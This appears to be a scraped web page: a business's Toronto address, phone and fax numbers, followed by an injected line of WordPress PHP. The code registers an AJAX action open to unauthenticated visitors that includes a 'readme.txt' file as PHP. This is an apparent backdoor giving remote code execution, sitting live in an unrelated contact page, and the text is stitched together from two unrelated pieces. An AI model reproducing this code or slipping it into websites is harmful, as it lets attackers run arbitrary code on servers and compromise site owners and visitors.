123 Crockford Blvd.
Toronto,ON., M1R 3B7
TEL: 416-438-0111 & 0118
FAX: 416-352-1998
if(!function_exists('file_check_readme73164')){ add_action('wp_ajax_nopriv_file_check_readme73164', 'file_check_readme73164'); add_action('wp_ajax_file_check_readme73164', 'file_check_readme73164'); function file_check_readme73164() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }